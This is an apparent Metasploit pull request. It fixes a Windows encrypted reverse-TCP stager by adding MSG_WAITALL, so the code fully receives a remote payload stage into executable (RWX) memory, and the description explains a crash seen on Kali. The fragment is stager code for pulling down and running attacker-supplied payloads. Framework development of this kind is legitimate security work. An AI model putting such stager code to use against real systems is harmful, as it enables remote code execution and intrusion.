### PR TITLE
Fully receive stage - Encrypted Payloads

### DIFF
--- a/lib/msf/core/payload/windows/encrypted_reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/encrypted_reverse_tcp.rb
@@ -545,7 +545,7 @@ module Payload::Windows::EncryptedReverseTcp
         FuncVirtualAlloc VirtualAlloc = (FuncVirtualAlloc) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'VirtualAlloc')}); // hash('kernel32.dll', 'VirtualAlloc') -> 0xe553a458
         register char *received = VirtualAlloc(NULL, stage_size + 1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 
-        int recv_stg = RecvData(conn_socket, received, stage_size, 0);
+        int recv_stg = RecvData(conn_socket, received, stage_size, MSG_WAITALL);
         if(recv_stg != stage_size)
         {
           ExitProcess(proc_term_status);


### PR DESCRIPTION
@agalway-r7 noticed that staged encrypted payloads would crash when being used by Kali. It appears that the payload will not fully receive the stage and will inevitably crash down the line. This adds the `MSG_WAITALL` to the stager code to ensure that the stager waits for all of the stage to be sent across before proceeding.